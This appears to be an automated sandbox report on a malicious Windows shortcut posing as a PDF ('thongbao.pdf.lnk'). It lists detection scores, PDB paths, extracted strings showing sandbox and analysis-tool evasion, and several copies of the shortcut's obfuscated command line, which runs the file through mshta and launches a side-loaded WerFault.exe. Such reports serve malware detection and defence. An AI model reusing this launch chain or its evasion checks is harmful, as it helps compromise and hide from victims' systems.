Source: p3a3TSUccX.lnk |
ReversingLabs: Detection: 21% |
Source: p3a3TSUccX.lnk |
Virustotal: Detection: 34% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 81.0% probability |
Source: |
Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk |
Source: p3a3TSUccX.lnk |
String found in binary or memory: (www.facebook.com/Thich.Hoc.Chui/)Tj equals www.facebook.com (Facebook) |
Source: p3a3TSUccX.lnk |
String found in binary or memory: /kTextE [/t (www.facebook.com/Thich.Hoc.Chui/)] equals www.facebook.com (Facebook) |
Source: Yara match |
File source: p3a3TSUccX.lnk, type: SAMPLE |
Source: p3a3TSUccX.lnk |
LNK file: $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe"))) |
Source: p3a3TSUccX.lnk |
Binary or memory string: OriginalFilenameWerFault.exej% vs p3a3TSUccX.lnk |
Source: p3a3TSUccX.lnk |
Binary string: o%XApplication Error%sInPageCoFireInPageError%s\system32\cofire.exe"%s" "%s" "%s"\Device\LanmanRedirector\%s :psapi.dllGetMappedFileNameWsfc_os.dllSfcIsFileProtectedFindFirstFileNameWFindNextFileNameWwdi.dll)n3Lgg |
Source: p3a3TSUccX.lnk |
Binary string: \\?\GLOBALROOT\Device\Mup\0000da39a3ee5e6b4b0d3255bfef95601890afd80709%04d/%02d/%02d:%02d:%02d:%02dU:!W:dc.xpmoddatadc.xpmodminidc.xpmodmemdc.OnDemandKdmpdc.expmoddatadc.expmodminidc.expmodmemdc.CustomDumpdc.xpminidumpdc.xpmemdumpdc.noreflectdc.forcenativedumpttd.tmpNoReflectionAbandoning reflection due to server requestAttempting to reflect reporting process!Reflection/ReserveMachineQueueDirectory attempt failed: 0X%XReflection attempt failed: 0X%XFalling back to non-reflected dump for reflection requestAttempting to cross-proc reporting process!Open process failed unexpectedly: 0X%XOut of cross process pid spaceelevatednon-elevatedfullReserveMachineQueueDirectory failed: 0x%xKernelDump failed: 0x%xCollectCrossProcessModuleDumps failed: 0x%xCollectCrossProcessDumps failed: 0x%xTTD recording not allowed: 0x%xControl Time Travel Debugging failed: 0x%xCould not collect xproc for reflection: 0x%x.dmpCould not collect dump for reflection cross process: 0x%xtruefalseCollectReflectionDump failed with: 0x%xCould not collect dump for cross process: 0x%xCould not collect cross dump for loaded module %ws: 0x%xFound %u native processes for xproc module: %sFound %u x86 processes for xproc module: %sTTD\ |
Source: p3a3TSUccX.lnk |
Binary string: t\Device\IPTSYSTEM\CurrentControlSet\Control\WMI\Autologger\Microsoft-OCA-IPTBufferSize{C712AF3D-ED1E-46A9-B843-E9014D29CAEE}LogFileModeMinimumBuffersEnableKernelFlagsStatusStartapi-ms-win-eventing-controller-l1-1-0.dllStartTraceWMicrosoft-OCA-IPTWIN://SYSAPPIDonecore\shell\lib\calleridentity\calleridentity.cppN%\ |
Source: classification engine |
Classification label: mal84.troj.evad.winLNK@4/0@0/0 |
Source: C:\Windows\System32\conhost.exe |
File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\forfiles.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))) |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" |
Source: C:\Windows\System32\forfiles.exe |
Section loaded: version.dll |
Source: LNK file |
Process created: C:\Windows\System32\cmd.exe |
Source: p3a3TSUccX.lnk |
Binary or memory string: INFOWERPINITIATECRASHREPORTING WAS MEOMEO!AESCHAININGMODECBCCHAININGMODEOBJECTLENGTHTCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXECONFIRMEDCHECK SIZE: %LU BYTESMY_PAYLOAD_LENERRORFAILED TO ALLOCATE MEMORYFAILED TO SET MEMORY PROTECTION[-] SANDBOX PROCESS DETECTED![+] DECRYPTING SC... |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" $r$u$n$d$l$l$3$2 $s$he$ll$3$2$.dll $$s$h$e$l$l$e$x$e$c_r$un$d$l$l "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /p c:\users\user /s /m "thongbao.pdf.lnk" /c "cmd /c copy "@path" "c:\users\user\iamhere.alf"") else (copy "%cd%\thongbao.pdf.lnk" "c:\users\user\iamhere.alf")) && m^s^h^t^a"."exe "c:\users\user\iamhere.alf" && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (timeout 5 && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (exit) else (start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))else (timeout 1 && start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe"))) |